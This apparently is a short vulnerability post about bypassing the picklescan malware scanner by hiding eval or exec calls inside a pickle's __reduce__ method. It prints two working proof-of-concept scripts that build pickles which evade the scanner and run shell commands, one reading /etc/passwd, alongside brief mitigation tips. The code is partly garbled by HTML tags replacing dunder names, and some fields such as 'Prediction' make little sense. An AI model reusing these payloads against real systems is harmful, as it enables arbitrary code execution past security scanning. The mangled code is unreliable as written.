Listen to this Post
The vulnerability is an unsafe deserialization bypass in the `picklescan` security tool. It works by obfuscating the malicious `eval` call to evade static detection. When `picklescan` analyzes a pickle file, it scans for dangerous function names like eval. The exploit creates a class with a `__reduce__` method that returns a tuple. Instead of directly returning (eval, ('malicious code',)), it returns a reference to a static method _obfuscated_eval. This method uses `getattr(builtins, “eval”)` to dynamically fetch the real `eval` function. This nesting and indirection hides the string “eval” from a simple string search, allowing the malicious pickle payload to pass through `picklescan` undetected. When the tainted pickle is loaded by a vulnerable application, the `__reduce__` method executes, triggering the `_obfuscated_eval` method, which then calls the hidden `eval` function with the attacker’s payload, leading to arbitrary code execution.
Platform: picklescan
Version: pre-0.1.0
Vulnerability : Unsafe Deserialization Bypass
Severity: Critical
date: 2024-10-26
Prediction: 2024-11-16
What Undercode Say:
pip install picklescan picklescan ./malicious.pkl
Example malicious pickle generation
import pickle, builtins, os
class EvilPayload:
def <strong>reduce</strong>(self):
cmd = "os.system('cat /etc/passwd')"
return getattr(builtins, "ex"+"ec"), (cmd,)
with open('exploit.pkl', 'wb') as f:
pickle.dump(EvilPayload(), f)
How Exploit:
import pickle, builtins
class EvilClass:
@staticmethod
def _obfuscated_eval(payload):
getattr(builtins, "eval")(payload)
def <strong>reduce</strong>(self):
payload = "<strong>import</strong>('os').system('id > /tmp/pwned')"
return self._obfuscated_eval, (payload,)
pickle.dump(EvilClass(), open('bad.pkl','wb'))
Protection from this CVE
Avoid unpickling untrusted data.
Use `picklescan` version >=0.1.0.
Employ allow-listing for serlialized objects.
Utilize alternative serialization formats (e.g., JSON).
Impact:
Remote Code Execution (RCE).
Bypasses security scanning.
Supply chain compromise.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

